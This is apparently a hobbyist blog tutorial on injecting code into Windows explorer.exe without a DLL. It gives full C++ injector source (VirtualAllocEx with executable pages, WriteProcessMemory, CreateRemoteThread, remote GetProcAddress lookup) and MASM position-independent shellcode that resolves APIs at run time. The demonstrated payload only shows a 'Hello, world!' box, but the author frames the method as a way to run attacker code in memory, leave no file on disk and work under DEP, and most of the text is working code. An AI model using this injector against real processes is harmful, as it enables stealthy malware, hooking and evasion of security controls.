DLL-less Code Injection (...and the most complicated Hello, World! program ever written)
There is a common technique for subverting running processes on modern Windows systems known as DLL injection. I won't go into the details of it, but the basic idea is to force the target process to load a DLL containing code written by the attacker. When the DLL is loaded, its entry point function is executed (DLL_PROCESS_ATTACH event) and the DLL has a chance to do whatever it wants within the address space of the target process. This could include setting up threads to monitor the process, installing hooks on some of the process's functions to redirect execution - the opportunities for sneakiness and trickery are endless. There is plenty of information about DLL injection on the web; here's one link: http://en.wikipedia.org/wiki/DLL_injection
DLL injection is a well-known technique, and there probably isn't much interesting to say about it that hasn't already been said before. What I am going to demonstrate is something much more exciting - code injection without the use of a DLL. The advantages of this are enormous: if you can inject code into a running process without using a DLL, you can get away without ever having to touch the filesystem - the piece of injected code only needs to exist in memory. Of course, you still need to be able to run the code that does the injection (the injector code, I'll call it) somehow. In the simplest case you might choose to do this by running an executable, and that executable would need to reside on disk. But there are conceivably other ways to get your injector code running on the target system. Here's some information about a Windows TCP/IP stack vulnerability that will frighten and amaze you: http://support.microsoft.com/kb/941644
Remote code execution (presumably in ring 0), and all modern versions of Windows are affected including 2000, XP, and Vista. It was discovered in early 2008. That's right, 2008. Of course it is now a known vulnerability and it has been fixed, but it proves that things like this are out there. Windows definitely has more of them, some of which haven't been discovered yet and, scarier still, some of which people have discovered but kept to themselves.
Anyway, the basic steps to DLL-less code injection are:
1) Find the process ID of the target process.
2) Open the target process.
3) Use VirtualAllocEx to allocate a chunk of memory in the address space of the target process. The allocated memory must be marked readable, writable, and executable.
4) Use WriteProcessMemory to copy a block of code (and probably data as well) to the memory allocated in step 3.
5) Use CreateRemoteThread to start up a thread (in the address space of the target process) that will begin executing the block of code copied in step 4.
We're going to do this using an 'injector' executable, and the block of code to be injected will be built and linked into our injector program. The first thing the injector program needs is a header file declaring two pointers: one points to the beginning of the injectable code block, and the other points to the end. This is the header file codeblk.h:
#ifndef _CODEBLK_H
#define _CODEBLK_H
#ifdef __cplusplus
extern "C" {
#endif
extern void *codeblk_start, *codeblk_end;
#ifdef __cplusplus
}
#endif
#endif
Next is the file winject.cpp, which contains code for finding the target process and doing the injection. For this example I use Windows explorer.exe as the target. This is the program that makes the start menu appear - Windows can actually run without it, but it is normally running for as long as you are logged in.
//
// winject.cpp:
// Inject the code from codeblk.asm into the Windows Explorer process.
//
#include "stdafx.h"
#include "codeblk.h"
// Convert a string (in place) to lowercase
static void strtolower(_TCHAR *s) {
for (; *s; ++s) {
if (*s >= 'A' && *s <= 'Z') {
*s += ('a'-'A');
}
}
}
// Find the PIDs of all processes whose executable name matches the given name.
// Return them in a buffer, and return the number of pids in 'npids'. The caller
// is responsible for deallocating the returned buffer with 'free()'. The returned
// buffer will be NULL if 'npids' is 0.
static DWORD *getPids(const _TCHAR *exename, DWORD *npids) {
#define PIDS_ALLOC_SIZE 10
DWORD *pids = NULL;
HANDLE hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32 proc;
proc.dwSize = sizeof(proc); // Process32First() fails unless dwSize is set first
DWORD pidsBufSize = 0;
*npids = 0;
if (hsnap != INVALID_HANDLE_VALUE) {
if (Process32First(hsnap, &proc)) {
do {
strtolower(proc.szExeFile);
if (strcmp(proc.szExeFile, exename) == 0) {
if (*npids == pidsBufSize) {
// Make more room for PIDs
pidsBufSize += PIDS_ALLOC_SIZE;
pids = (DWORD*)realloc(pids, pidsBufSize*sizeof(DWORD));
}
pids[(*npids)++] = proc.th32ProcessID;
}
} while (Process32Next(hsnap, &proc));
}
CloseHandle(hsnap);
}
return pids;
#undef PIDS_ALLOC_SIZE
}
// Get the fully-qualified path to the Windows executable 'Explorer.exe'. We can't assume that
// it is on the C: drive, and we probably shouldn't assume the system directory is '\Windows' either.
static _TCHAR *getExplorerFullyQualifiedPath(DWORD *pathlen) {
const _TCHAR *varname = "SystemRoot";
const _TCHAR exename[] = "\\explorer.exe";
_TCHAR *path = NULL;
DWORD len = GetEnvironmentVariable(varname, NULL, 0);
if (len) {
*pathlen = len + sizeof(exename) - 1;
path = (_TCHAR*)malloc(*pathlen);
GetEnvironmentVariable(varname, path, len);
strcat(path, exename);
} else {
// Can't think of a situation when 'SystemRoot' wouldn't be available, but...
exit(1);
}
strtolower(path);
return path;
}
// Return the PID for Windows explorer. Returns 0 if an error occurs. One potential reason
// for failure is that explorer is not running.
static DWORD getExplorerPid(void) {
const _TCHAR *pname = "explorer.exe";
DWORD targetlen;
_TCHAR *target = getExplorerFullyQualifiedPath(&targetlen);
_TCHAR *tempPath = (_TCHAR*)malloc(targetlen);
DWORD npids;
DWORD epid = 0; // PID for explorer
// Find all matching pids
DWORD *pids = getPids(pname, &npids);
if (pids) {
// Check fully-qualified path name for each
for (DWORD n = 0; n < npids; ++n) {
HANDLE hproc = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pids[n]);
if (hproc) {
if ( GetModuleFileNameEx(hproc, NULL, tempPath, targetlen) ) {
strtolower(tempPath);
if (strcmp(tempPath, target) == 0) {
// Found a match
epid = pids[n];
CloseHandle(hproc);
break;
}
}
CloseHandle(hproc);
}
}
free(pids);
}
free(target);
free(tempPath);
return epid;
}
// Open and inject code into the process with the given PID. Returns a pointer to the
// injected code, or NULL if an error occurred. The caller is responsible for closing
// the process handle returned in 'hproc'.
static void *inject(DWORD pid, HANDLE *hproc) {
void *code = NULL;
*hproc = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION |
PROCESS_VM_WRITE | PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, FALSE, pid);
if (*hproc) {
unsigned int codelen;
__asm {
mov eax, codeblk_end
mov ecx, codeblk_start
sub eax, ecx
mov codelen, eax
}
// The allocated pages need to be writable so we can write the injected code to them
// and so the injected code can store variables, and they also need to be executable
// so the injected code can run.
code = VirtualAllocEx(*hproc, NULL, codelen, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
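if (code) {
if (!WriteProcessMemory(*hproc, code, codeblk_start, codelen, NULL)) {
// The copy failed. Release the block so the caller never runs a half-written one.
VirtualFreeEx(*hproc, code, 0, MEM_RELEASE);
code = NULL;
}
}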
}
return code;
}
static HANDLE runInjectedCode(void *codeblk, HANDLE hproc) {
if (!codeblk || !hproc) {
return NULL;
}
#define MODULES_ALLOC_SIZE 1024
// Enumerate all modules loaded by the process
HMODULE *modules = NULL;
DWORD nbuf = 0;
DWORD nmod = 0;
do {
nbuf += MODULES_ALLOC_SIZE;
modules = (HMODULE*)realloc(modules, nbuf);
if (!EnumProcessModules(hproc, modules, nbuf, &nmod)) {
if (modules) {
free(modules);
}
return NULL;
}
} while (nmod >= nbuf);
#undef MODULES_ALLOC_SIZE
// Find kernel32.dll in the remote process. Chances are very good that it is loaded at
// the same virtual address in our process and in the remote process, but this isn't
// something we should depend on. Once we've found kernel32.dll, we calculate the address
// of GetProcAddress() for the remote process.
_TCHAR modname[sizeof("kernel32.dll")];
FARPROC rmtGetProcAddr = NULL;
for (unsigned int n = 0; n < nmod / sizeof(HMODULE); ++n) {
if (GetModuleBaseName(hproc, modules[n], modname, sizeof(modname)) == sizeof(modname)-1) {
strtolower(modname);
if (strcmp(modname, "kernel32.dll") == 0) {
// Get the address of the 'GetProcAddress' function in the remote process:
// 1) Find address of 'GetProcAddress' within our address space
// 2) Find offset of 'GetProcAddress' within kernel32.dll by subtracting our
// process's kernel32.dll module handle. This works because the module
// handle is simply the base address of the module.
// 3) Add offset from step 2 to the kernel32.dll module handle for the remote
// process.
HMODULE ourKernel32 = GetModuleHandle("kernel32");
FARPROC ourGetProcAddr = GetProcAddress(ourKernel32, "GetProcAddress");
if (ourKernel32 && ourGetProcAddr) {
HMODULE rmtKernel32 = modules[n];
__asm {
mov eax, ourGetProcAddr
sub eax, ourKernel32
add eax, rmtKernel32
mov rmtGetProcAddr, eax
}
}
break;
}
}
}
free(modules);
if (!rmtGetProcAddr) {
return NULL;
}
return CreateRemoteThread(hproc, NULL, 0, (LPTHREAD_START_ROUTINE)codeblk, rmtGetProcAddr, 0, NULL);
}
int _tmain(int argc, _TCHAR* argv[]) {
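DWORD pid = getExplorerPid();
if (!pid) {
return 1; // Explorer isn't running, or we couldn't identify it
}
HANDLE hproc = NULL;
void *codeblk = inject(pid, &hproc);
HANDLE hthr = runInjectedCode(codeblk, hproc);
if (hthr) {
CloseHandle(hthr);
}
if (hproc) {
CloseHandle(hproc);
}
return hthr ? 0 : 1;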
}
I'm not going to explain each line of the code, but here are a few things that are noteworthy:
1) The function 'getPids()' doesn't just find the first process with the module name "explorer.exe", it finds all of them. Later we sort through them to find the one from the system directory (it would be C:\Windows\explorer.exe on most systems). The reason for this is that not every module named "explorer.exe" is necessarily Windows explorer - you could easily rename one of your other applications "explorer.exe" and run it. I like being thorough.
2) String comparisons are case-insensitive, since Windows treats file names as case-insensitive by default.
3) I use the base address of kernel32.dll within the injector program, the base address of kernel32.dll from the target process, and the distance from the beginning of kernel32.dll to the 'GetProcAddress' function to find the address of 'GetProcAddress' within the target process. On Windows XP, I don't think any of this is necessary. IIRC, kernel32.dll is always loaded at base address 0x7c800000 for all processes. Since the base address of the DLL is the same for the injector program and the target process, the addresses of all kernel32.dll functions are the same for both processes and none of the arithmetic is necessary. However, I don't think Vista works this way - I've heard it intentionally randomizes base addresses for security reasons (address space layout randomization, or ASLR). I haven't tried running this program on Vista yet.
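4) This code was written for MS Visual C++. My stdafx.h includes windows.h, tlhelp32.h, and psapi.h. These 3 files need to get included somehow, however you do it, and the program has to be linked against psapi.lib. Note that the code mixes _TCHAR with plain char functions such as strcmp(), so it only builds with the multi-byte character set, not Unicode.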
5) I use assembly in a few places to do pointer arithmetic. You can do it with casts instead but it looks just as dirty and Visual Studio will bitch and moan about pointer truncation.
6) The single 4-byte argument that gets passed to the remote thread upon its creation is 'rmtGetProcAddr'. This is the address of the 'GetProcAddress' function within the target process.
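The address arithmetic from notes 3) and 5) can also be written with integer casts instead of inline assembly. Here is a minimal sketch in portable C, assuming the addresses have already been converted to uintptr_t; the name rebase_address is mine and does not appear in winject.cpp:

```c
#include <stdint.h>

/* Translate an address inside a module in our process to the matching
   address in another process, given the base address the module has in
   each process. The inputs are plain integers, so nothing is dereferenced. */
static uintptr_t rebase_address(uintptr_t local_addr,
                                uintptr_t local_base,
                                uintptr_t remote_base)
{
    uintptr_t offset = local_addr - local_base;  /* distance into the module */
    return remote_base + offset;
}
```

With made-up numbers: a function at 0x7c80ae40 in a module based at 0x7c800000 sits 0xae40 bytes into the module, so if the other process has the module at 0x76d10000 the function is at 0x76d1ae40 there. When both bases are equal the result is just the original address, which is the XP case described in note 3).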
Okay, so now we have a program that can inject code into explorer.exe. The only thing left is to create the code that gets injected. And this is the really ugly, difficult part. The basic problem with the injected block is that as soon as we run it within the target process, it suddenly knows nothing about what is around it. It is all alone in the unfamiliar world of another process and it has nothing with it except the little four-byte argument that was passed to CreateRemoteThread when we called it. It's tempting for us to start off our injectable code block by doing something like this:
MessageBox(NULL, "This is a test", "Test", MB_OK);
...But it is not going to be nearly that easy. That will compile and link. But the compiled code will refer to the MessageBox function within the address space of the injector program. The MessageBox function may be in a different place in the target process, so the address won't work any more after the code is copied over. Also, the two strings "This is a test" and "Test" will be stored in a data section of the injector program, and the compiled code will refer to them by their addresses. Once the code is copied over, these addresses are meaningless and there is no way to get at the strings - they are in the data portion of a different process. There are other problems too, such as the stack checks and security cookies that Visual Studio inserts into your code to detect buffer overflows - these also use addresses that will become meaningless when you copy the code over. The stack checks can be disabled, but the problem of being able to access strings and other data from the injected code can't reasonably be solved with C. We will end up having no choice but to resort to assembly if we actually want to _do_ anything.
The simplest possible piece of injected code we can create just returns immediately. Here is code for MASM:
.686P
.model flat
; Some versions of MASM make procedures public by default. Pain in the ass.
OPTION PROC:PRIVATE
codeblk SEGMENT
; Entry point for remote thread. This must be the first thing in the code block
_threadMain PROC
xor eax, eax
ret 4
_threadMain ENDP
; This should be the last thing in the code block
PUBLIC _codeblk_end
PUBLIC _codeblk_start
_codeblk_end dd _codeblk_end
_codeblk_start dd _threadMain
codeblk ENDS
END
Not terribly interesting, but it's a start. Now, the only thing we have is the address of the 'GetProcAddress' function, so we can call that to find out where various other API functions are. But there are two problems:
1) The first argument to GetProcAddress is a module handle. We don't have any module handles.
2) The second argument to GetProcAddress is a string. We have to be able to pass the address of a string somehow.
The solution to problem 1) is a dirty, dirty hack. We know that the address of 'GetProcAddress' is an address within kernel32.dll. We know that Windows always loads DLLs with base addresses that end in 0x0000 (or at least I think it does). Finally, we know that the function GetProcAddress appears well within the first 0x10000 bytes of kernel32.dll. This means we can just chop off the low 16 bits of the address and we have a module handle. Yay!
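To make the truncation concrete, here is a small sketch in portable C. It only does the arithmetic on 32-bit values; the function names and the sample addresses are made up for illustration. As far as I know the alignment assumption holds because Windows hands out address space in 64 KB units, but the "first 0x10000 bytes" part depends entirely on where the function happens to live in the DLL:

```c
#include <stdint.h>

/* Clear the low 16 bits of an address, i.e. round it down to a 64 KB boundary. */
static uint32_t round_down_64k(uint32_t addr)
{
    return addr & 0xFFFF0000u;
}

/* The shortcut only yields the real module base when the address lies
   within the first 0x10000 bytes of the module. */
static int shortcut_is_valid(uint32_t addr, uint32_t real_base)
{
    return round_down_64k(addr) == real_base;
}
```

For example, 0x7c80ae40 truncates to 0x7c800000. An address one 64 KB block further in, such as 0x7c81ae40, truncates to 0x7c810000, which is not the module base - that is why this is a hack and not a general solution.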
The solution to problem 2) involves something that we can't do with C. When we put strings in our C code they are actually placed in a separate data section in the executable. We need the data to sit right next to the code so it all gets copied over together. When the data and code are sitting next to each other, there is some distance between them that doesn't change. That is exactly what we need. If the injected code can find the absolute address of some part of itself, and if it can find the distance from there to the beginning of the data, then it can find the absolute address of the data. A piece of code can find its own address by doing something like this:
call GRAB_EIP ; Pushes return address. Return address is address of GRAB_EIP
GRAB_EIP:
pop eax ; Pop address of GRAB_EIP off the stack into eax
That is essentially like saying 'mov eax, eip', except that that isn't a valid instruction.
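The reason this is enough can be shown without any assembly. The sketch below is a portable C simulation, not injectable code: a struct stands in for the code block, and ANCHOR_OFFSET is a made-up position that plays the role of GRAB_EIP. The block is copied to a new location and the string is found again from the anchor's runtime address plus a distance fixed at build time:

```c
#include <stddef.h>
#include <string.h>

/* Stand-in for the injected block: "code" bytes followed by data. */
struct blob {
    unsigned char code[16];    /* placeholder bytes, never executed */
    char          message[16];
};

/* Offset of a known spot inside the code, playing the role of GRAB_EIP. */
#define ANCHOR_OFFSET 5

/* Find the data from the anchor's runtime address. The distance between
   the two is known at build time and doesn't change when the block moves. */
static const char *find_message(const unsigned char *anchor)
{
    ptrdiff_t distance = (ptrdiff_t)offsetof(struct blob, message) - ANCHOR_OFFSET;
    return (const char *)(anchor + distance);
}

/* Copy the block somewhere else and look the message up in the copy. */
static int message_survives_copy(void)
{
    struct blob original, copy;
    const unsigned char *anchor;

    memset(&original, 0, sizeof original);
    strcpy(original.message, "Hello, world!");
    memcpy(&copy, &original, sizeof copy);

    anchor = (const unsigned char *)&copy + ANCHOR_OFFSET;
    return strcmp(find_message(anchor), "Hello, world!") == 0;
}
```

The only thing the real code has to discover at run time is the anchor's address, which is what the call/pop pair provides.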
Once we can use strings and call GetProcAddress, we're pretty much in the clear. We can use GetProcAddress to find GetModuleHandle or LoadLibrary, which means we can then get the addresses of functions from DLLs other than kernel32. The example code below demonstrates everything explained so far. It contains a table of modules and functions, and _linkFunctions loads each of the modules and fills the table in with the addresses of the functions. I call the MessageBox function to show that it works.
.686P
.model flat
; Some versions of MASM make procedures public by default. Pain in the ass.
OPTION PROC:PRIVATE
MB_OK EQU 0
MB_ICONASTERISK EQU 040h
codeblk SEGMENT
; Entry point for remote thread. This must be the first thing in the code block
_threadMain PROC
push [esp+4]
call _linkFunctions
; Display a 'Hello, world!' message box to prove our function table works
pushd MB_OK OR MB_ICONASTERISK ; Type flags
lea edx, [esp][-12]
pushd edx ; Caption (empty string). Use the address of the null HWND.
call _getDataStartPointer
lea ecx, [eax][helloWorldStr-DATA_START]
push ecx ; Message string
pushd 0 ; HWND (null)
add eax, pMessageBoxA-DATA_START
call dword ptr [eax]
xor eax, eax
ret 4
_threadMain ENDP
; Fills in the function table. Single argument is the address of the GetProcAddress function
_linkFunctions PROC
push ebp
mov ebp, esp
push ebx ; Holds address of 'GetProcAddress'
push esi ; Holds address of 'LoadLibraryA'
push edi ; Holds address of data in data table
; We get a module handle (base address) for kernel32.dll by truncating the lower 16 bits
; from our 'GetProcAddress' pointer. This works because 'GetProcAddress' (currently) appears
; within the first 0x10000 bytes of kernel32, and because Windows maps DLLs to base addresses
; divisible by 0x10000 (or at least it always seems to - that may not even be guaranteed).
; This is a bit of a hack.
mov ebx, [ebp+8]
mov edx, ebx
xor dx, dx
call _getDataStartPointer
mov edi, eax
add eax, loadLibraryStr-DATA_START
push eax ; 'LoadLibrary' string
push edx ; Handle to kernel32
call ebx ; Get the address of LoadLibraryA()
mov esi, eax
add edi, runtimeLinkFunctionTable-DATA_START ; Get first module name
FOR_EACH_MODULE:
mov dx, di ; These four instructions use some trickery to
neg dl ; round edi up to the nearest dword boundary.
and edx, 03h
add edi, edx
add edi, 4 ; Skip past module instance handle
mov dl, [edi]
test dl, dl ; Check for empty module name
jz FOR_EACH_MODULE_END
push edi ; Module name
call esi ; LoadLibrary
mov [edi-4], eax ; Save instance handle in the table
push eax ; Save the instance handle on the stack too
FOR_EACH_FUNCTION:
xor al, al
or ecx, -1 ; scasb counts ecx down, and the API calls above may have left anything in it
repnz scasb ; Find the end of the current string
mov dx, di ; Align edi to dword boundary, just as we did above
neg dl
and edx, 03h
add edi, edx
add edi, 4 ; Skip past the address at the beginning of the next entry
mov dl, [edi]
test dl, dl ; Check for empty function name
jz FOR_EACH_FUNCTION_END
push edi ; Function name
push [esp+4] ; Instance handle
call ebx ; Call GetProcAddress()
mov [edi-4], eax ; Store the function address in the table
jmp FOR_EACH_FUNCTION
FOR_EACH_FUNCTION_END:
pop eax
inc edi ; Go to next module
jmp FOR_EACH_MODULE
FOR_EACH_MODULE_END:
pop edi
pop esi
pop ebx
pop ebp
ret 4
_linkFunctions ENDP
; Find an absolute address of the start of the data based on the absolute address in
; EIP and the difference between this function's location and DATA_START.
; Returns result in eax and doesn't trash any other registers.
_getDataStartPointer PROC
call GRAB_EIP
GRAB_EIP:
pop eax
add eax, DATA_START-GRAB_EIP
ret
_getDataStartPointer ENDP
; The data, which we keep separate although it is all part of the same code segment
DATA_START:
loadLibraryStr db 'LoadLibraryA',0
helloWorldStr db 'Hello, world!',0
; Functions we link to at runtime. The format is:
; [instance handle for module 1][name of module 1],0
; [address of function 1 from module 1][name of function 1 from module 1],0
; [address of function 2 from module 1][name of function 2 from module 1],0
; ...
; [address of function N from module 1][name of function N from module 1],0
; [dummy address (four zero bytes)], 0
; [instance handle for module 2][name of module 2],0
; [address of function 1 from module 2][name of function 1 from module 2],0
; ...etc.
;
Func MACRO name
ALIGN 4
p&name dd ?
db '&name',0
ENDM
ModuleFuncTable MACRO name
ALIGN 4
pmod&name dd ?
db '&name',0
ENDM
TableEnd MACRO
ALIGN 4
db 5 dup (0) ; Dummy address plus empty name. The loops test for a zero byte here.
ENDM
ALIGN 4
runtimeLinkFunctionTable:
ModuleFuncTable Kernel32
Func GetProcAddress
Func GetModuleHandleA
TableEnd
ModuleFuncTable Gdi32
Func CreateCompatibleDC
Func CreateCompatibleBitmap
Func DeleteDC
Func DeleteObject
Func SelectObject
TableEnd
ModuleFuncTable Msimg32
Func GradientFill
TableEnd
ModuleFuncTable User32
Func CreateWindowExA
Func DestroyWindow
Func GetDC
Func GetSystemMetrics
Func MessageBoxA
Func PeekMessageA
Func DispatchMessageA
Func ReleaseDC
Func SendMessageA
Func SetWindowPos
Func ShowWindow
TableEnd
TableEnd
; This should be the last thing in the code block
PUBLIC _codeblk_end
PUBLIC _codeblk_start
_codeblk_end dd _codeblk_end
_codeblk_start dd _threadMain
codeblk ENDS
END
When built properly, this code should run fine on any XP system. It works fine even when explorer.exe is protected by DEP. I haven't tested it on Vista yet.
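If the table layout and the alignment trick in _linkFunctions are hard to follow in assembly, here is a rough model of the same walk in portable C. It is only a sketch: it works on offsets into a byte buffer instead of real addresses, it counts function names instead of calling GetProcAddress, and the helper names (align4, put_entry, count_functions, demo_count) are mine.

```c
#include <stddef.h>
#include <string.h>

/* Round an offset up to the next multiple of 4; same effect as the
   "neg / and 03h / add" sequence in the assembly. */
static size_t align4(size_t off)
{
    return off + ((0u - off) & 3u);
}

/* Append one table entry: pad to a 4-byte boundary, leave a zeroed 4-byte
   slot, then store the NUL-terminated name. Returns the new end offset. */
static size_t put_entry(unsigned char *buf, size_t off, const char *name)
{
    off = align4(off);
    memset(buf + off, 0, 4);
    off += 4;
    strcpy((char *)buf + off, name);
    return off + strlen(name) + 1;
}

/* Walk the table in the same order as _linkFunctions and count the function
   names. An entry with an empty name ends a function list or the module list. */
static int count_functions(const unsigned char *buf)
{
    size_t off = 0;
    int count = 0;
    for (;;) {
        off = align4(off) + 4;            /* skip the module handle slot */
        if (buf[off] == 0) break;         /* empty module name: done */
        for (;;) {
            off += strlen((const char *)buf + off) + 1;  /* past current name */
            off = align4(off) + 4;        /* skip the next address slot */
            if (buf[off] == 0) break;     /* empty function name */
            ++count;
        }
        ++off;                            /* step past the terminator byte */
    }
    return count;
}

/* Build a small two-module table (contents chosen for illustration) and count it. */
static int demo_count(void)
{
    unsigned char buf[128];
    size_t off = 0;
    memset(buf, 0, sizeof buf);
    off = put_entry(buf, off, "Kernel32");
    off = put_entry(buf, off, "GetModuleHandleA");
    off = put_entry(buf, off, "");        /* end of Kernel32's functions */
    off = put_entry(buf, off, "User32");
    off = put_entry(buf, off, "MessageBoxA");
    off = put_entry(buf, off, "ShowWindow");
    off = put_entry(buf, off, "");        /* end of User32's functions */
    off = put_entry(buf, off, "");        /* end of the module list */
    (void)off;
    return count_functions(buf);
}
```

Each put_entry(..., "") call corresponds to one TableEnd in the MASM source, which is why the assembly table finishes with two of them: one closes the last module's function list and one closes the module list itself.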
Have fun!